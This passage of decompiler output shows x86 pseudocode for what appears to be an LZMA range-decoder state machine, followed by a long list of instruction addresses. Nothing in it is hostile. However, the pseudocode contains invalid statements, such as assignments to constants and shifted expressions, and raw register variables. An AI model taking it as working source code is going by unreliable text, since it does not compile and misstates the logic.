                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t156 = __ebp - 0x70;
                                                                                    											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t156;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											while(1) {
                                                                                    												L48:
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													break;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												__edx = __ebx + __ebx;
                                                                                    												__ecx =  *(__ebp - 0x10);
                                                                                    												__esi = __edx + __eax;
                                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edi = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													_t170 = __edx + 1; // 0x1
                                                                                    													__ebx = _t170;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eflags = __eax;
                                                                                    													 *__esi = __ax;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edi;
                                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													goto L46;
                                                                                    												}
                                                                                    											}
                                                                                    											L54:
                                                                                    											_t173 = __ebp - 0x34;
                                                                                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    											__eflags =  *_t173;
                                                                                    											goto L55;
                                                                                    										case 0xf:
                                                                                    											L58:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0xf;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t203 = __ebp - 0x70;
                                                                                    											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t203;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L60:
                                                                                    											__eflags = __ebx - 0x100;
                                                                                    											if(__ebx >= 0x100) {
                                                                                    												L55:
                                                                                    												__al =  *(__ebp - 0x44);
                                                                                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    												goto L56;
                                                                                    											}
                                                                                    											L61:
                                                                                    											__eax =  *(__ebp - 0x58);
                                                                                    											__edx = __ebx + __ebx;
                                                                                    											__ecx =  *(__ebp - 0x10);
                                                                                    											__esi = __edx + __eax;
                                                                                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__ax =  *__esi;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__edi = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												_t217 = __edx + 1; // 0x1
                                                                                    												__ebx = _t217;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eflags = __eax;
                                                                                    												 *__esi = __ax;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edi;
                                                                                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L60;
                                                                                    											} else {
                                                                                    												goto L58;
                                                                                    											}
                                                                                    										case 0x10:
                                                                                    											L110:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x10;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t366 = __ebp - 0x70;
                                                                                    											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t366;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											goto L112;
                                                                                    										case 0x11:
                                                                                    											L69:
                                                                                    											__esi =  *(__ebp - 0x58);
                                                                                    											 *(__ebp - 0x84) = 0x12;
                                                                                    											L132:
                                                                                    											 *(_t612 - 0x54) = _t605;
                                                                                    											goto L133;
                                                                                    										case 0x12:
                                                                                    											goto L0;
                                                                                    										case 0x13:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												_t469 = __ebp - 0x58;
                                                                                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                    												__eflags =  *_t469;
                                                                                    												 *(__ebp - 0x30) = 0x10;
                                                                                    												 *(__ebp - 0x40) = 8;
                                                                                    												goto L144;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x4c);
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                                    											 *(__ebp - 0x30) = 8;
                                                                                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                    											goto L130;
                                                                                    										case 0x14:
                                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                    											__eax =  *(__ebp - 0x80);
                                                                                    											L140:
                                                                                    											 *(_t612 - 0x88) = _t533;
                                                                                    											goto L1;
                                                                                    										case 0x15:
                                                                                    											__eax = 0;
                                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    											__al = __al & 0x000000fd;
                                                                                    											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                    											goto L121;
                                                                                    										case 0x16:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__eflags = __eax - 4;
                                                                                    											if(__eax >= 4) {
                                                                                    												_push(3);
                                                                                    												_pop(__eax);
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 4);
                                                                                    											 *(__ebp - 0x40) = 6;
                                                                                    											__eax = __eax << 7;
                                                                                    											 *(__ebp - 0x7c) = 0x19;
                                                                                    											 *(__ebp - 0x58) = __eax;
                                                                                    											goto L145;
                                                                                    										case 0x17:
                                                                                    											goto L145;
                                                                                    										case 0x18:
                                                                                    											L146:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x18;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t484 = __ebp - 0x70;
                                                                                    											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t484;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L148:
                                                                                    											_t487 = __ebp - 0x48;
                                                                                    											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                    											__eflags =  *_t487;
                                                                                    											goto L149;
                                                                                    										case 0x19:
                                                                                    											__eflags = __ebx - 4;
                                                                                    											if(__ebx < 4) {
                                                                                    												 *(__ebp - 0x2c) = __ebx;
                                                                                    												L120:
                                                                                    												_t394 = __ebp - 0x2c;
                                                                                    												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                    												__eflags =  *_t394;
                                                                                    												L121:
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__eflags = __eax -  *(__ebp - 0x60);
                                                                                    												if(__eax >  *(__ebp - 0x60)) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                    												__eax =  *(__ebp - 0x30);
                                                                                    												_t401 = __ebp - 0x60;
                                                                                    												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                    												__eflags =  *_t401;
                                                                                    												goto L124;
                                                                                    											}
                                                                                    											__ecx = __ebx;
                                                                                    											__eax = __ebx;
                                                                                    											__ecx = __ebx >> 1;
                                                                                    											__eax = __ebx & 0x00000001;
                                                                                    											__ecx = (__ebx >> 1) - 1;
                                                                                    											__al = __al | 0x00000002;
                                                                                    											__eax = (__ebx & 0x00000001) << __cl;
                                                                                    											__eflags = __ebx - 0xe;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__ebx >= 0xe) {
                                                                                    												__ebx = 0;
                                                                                    												 *(__ebp - 0x48) = __ecx;
                                                                                    												L103:
                                                                                    												__eflags =  *(__ebp - 0x48);
                                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                                    													__eax = __eax + __ebx;
                                                                                    													 *(__ebp - 0x40) = 4;
                                                                                    													 *(__ebp - 0x2c) = __eax;
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__eax =  *(__ebp - 4) + 0x644;
                                                                                    													__eflags = __eax;
                                                                                    													L109:
                                                                                    													__ebx = 0;
                                                                                    													 *(__ebp - 0x58) = __eax;
                                                                                    													 *(__ebp - 0x50) = 1;
                                                                                    													 *(__ebp - 0x44) = 0;
                                                                                    													 *(__ebp - 0x48) = 0;
                                                                                    													L113:
                                                                                    													__eax =  *(__ebp - 0x40);
                                                                                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                    														_t392 = __ebp - 0x2c;
                                                                                    														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                    														__eflags =  *_t392;
                                                                                    														goto L120;
                                                                                    													}
                                                                                    													__eax =  *(__ebp - 0x50);
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    													__eax =  *(__ebp - 0x58);
                                                                                    													__esi = __edi + __eax;
                                                                                    													 *(__ebp - 0x54) = __esi;
                                                                                    													__ax =  *__esi;
                                                                                    													__ecx = __ax & 0x0000ffff;
                                                                                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                    													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                    													if( *(__ebp - 0xc) >= __edx) {
                                                                                    														__ecx = 0;
                                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                    														__ecx = 1;
                                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                    														__ebx = 1;
                                                                                    														__ecx =  *(__ebp - 0x48);
                                                                                    														__ebx = 1 << __cl;
                                                                                    														__ecx = 1 << __cl;
                                                                                    														__ebx =  *(__ebp - 0x44);
                                                                                    														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                    														__cx = __ax;
                                                                                    														__cx = __ax >> 5;
                                                                                    														__eax = __eax - __ecx;
                                                                                    														__edi = __edi + 1;
                                                                                    														__eflags = __edi;
                                                                                    														 *(__ebp - 0x44) = __ebx;
                                                                                    														 *__esi = __ax;
                                                                                    														 *(__ebp - 0x50) = __edi;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x10) = __edx;
                                                                                    														0x800 = 0x800 - __ecx;
                                                                                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    														 *__esi = __dx;
                                                                                    													}
                                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    														L112:
                                                                                    														_t369 = __ebp - 0x48;
                                                                                    														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                    														__eflags =  *_t369;
                                                                                    														goto L113;
                                                                                    													} else {
                                                                                    														goto L110;
                                                                                    													}
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0xc);
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                    													__ecx =  *(__ebp - 0x10);
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    													__ebx = __ebx | 0x00000001;
                                                                                    													__eflags = __ebx;
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													L102:
                                                                                    													_t339 = __ebp - 0x48;
                                                                                    													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                    													__eflags =  *_t339;
                                                                                    													goto L103;
                                                                                    												} else {
                                                                                    													goto L100;
                                                                                    												}
                                                                                    											}
                                                                                    											__edx =  *(__ebp - 4);
                                                                                    											__eax = __eax - __ebx;
                                                                                    											 *(__ebp - 0x40) = __ecx;
                                                                                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                    											goto L109;
                                                                                    										case 0x1a:
                                                                                    											L56:
                                                                                    											__eflags =  *(__ebp - 0x64);
                                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x1a;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x68);
                                                                                    											__al =  *(__ebp - 0x5c);
                                                                                    											__edx =  *(__ebp - 8);
                                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    											 *( *(__ebp - 0x68)) = __al;
                                                                                    											__ecx =  *(__ebp - 0x14);
                                                                                    											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                    											__eax = __ecx + 1;
                                                                                    											__edx = 0;
                                                                                    											_t192 = __eax %  *(__ebp - 0x74);
                                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                                    											__edx = _t192;
                                                                                    											goto L80;
                                                                                    										case 0x1b:
                                                                                    											L76:
                                                                                    											__eflags =  *(__ebp - 0x64);
                                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x1b;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x14);
                                                                                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    											__eflags = __eax -  *(__ebp - 0x74);
                                                                                    											if(__eax >=  *(__ebp - 0x74)) {
                                                                                    												__eax = __eax +  *(__ebp - 0x74);
                                                                                    												__eflags = __eax;
                                                                                    											}
                                                                                    											__edx =  *(__ebp - 8);
                                                                                    											__cl =  *(__eax + __edx);
                                                                                    											__eax =  *(__ebp - 0x14);
                                                                                    											 *(__ebp - 0x5c) = __cl;
                                                                                    											 *(__eax + __edx) = __cl;
                                                                                    											__eax = __eax + 1;
                                                                                    											__edx = 0;
                                                                                    											_t275 = __eax %  *(__ebp - 0x74);
                                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                                    											__edx = _t275;
                                                                                    											__eax =  *(__ebp - 0x68);
                                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    											_t284 = __ebp - 0x64;
                                                                                    											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                    											__eflags =  *_t284;
                                                                                    											 *( *(__ebp - 0x68)) = __cl;
                                                                                    											L80:
                                                                                    											 *(__ebp - 0x14) = __edx;
                                                                                    											goto L81;
                                                                                    										case 0x1c:
                                                                                    											while(1) {
                                                                                    												L124:
                                                                                    												__eflags =  *(__ebp - 0x64);
                                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                                    													break;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__edx =  *(__ebp - 8);
                                                                                    												__cl =  *(__eax + __edx);
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												 *(__ebp - 0x5c) = __cl;
                                                                                    												 *(__eax + __edx) = __cl;
                                                                                    												__eax = __eax + 1;
                                                                                    												__edx = 0;
                                                                                    												_t415 = __eax %  *(__ebp - 0x74);
                                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                                    												__edx = _t415;
                                                                                    												__eax =  *(__ebp - 0x68);
                                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                    												__eflags =  *(__ebp - 0x30);
                                                                                    												 *( *(__ebp - 0x68)) = __cl;
                                                                                    												 *(__ebp - 0x14) = _t415;
                                                                                    												if( *(__ebp - 0x30) > 0) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													L81:
                                                                                    													 *(__ebp - 0x88) = 2;
                                                                                    													goto L1;
                                                                                    												}
                                                                                    											}
                                                                                    											 *(__ebp - 0x88) = 0x1c;
                                                                                    											L170:
                                                                                    											_push(0x22);
                                                                                    											_pop(_t567);
                                                                                    											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                    											_t535 = 0;
                                                                                    											L172:
                                                                                    											return _t535;
                                                                                    									}
                                                                                    								}
                                                                                    								L171:
                                                                                    								_t535 = _t534 | 0xffffffff;
                                                                                    								goto L172;
                                                                                    							}
                                                                                    						}
                                                                                    						__eax =  *(__ebp - 0x50);
                                                                                    						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    						__eax =  *(__ebp - 0x58);
                                                                                    						__esi = __edx + __eax;
                                                                                    						 *(__ebp - 0x54) = __esi;
                                                                                    						__ax =  *__esi;
                                                                                    						__edi = __ax & 0x0000ffff;
                                                                                    						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    						if( *(__ebp - 0xc) >= __ecx) {
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    							__cx = __ax;
                                                                                    							__cx = __ax >> 5;
                                                                                    							__eax = __eax - __ecx;
                                                                                    							__edx = __edx + 1;
                                                                                    							 *__esi = __ax;
                                                                                    							 *(__ebp - 0x50) = __edx;
                                                                                    						} else {
                                                                                    							 *(__ebp - 0x10) = __ecx;
                                                                                    							0x800 = 0x800 - __edi;
                                                                                    							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    							 *__esi = __cx;
                                                                                    						}
                                                                                    						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    							goto L148;
                                                                                    						} else {
                                                                                    							goto L146;
                                                                                    						}
                                                                                    					}
                                                                                    					goto L1;
                                                                                    				}
                                                                                    			}








                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x00000000
                                                                                    0x0040739b
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
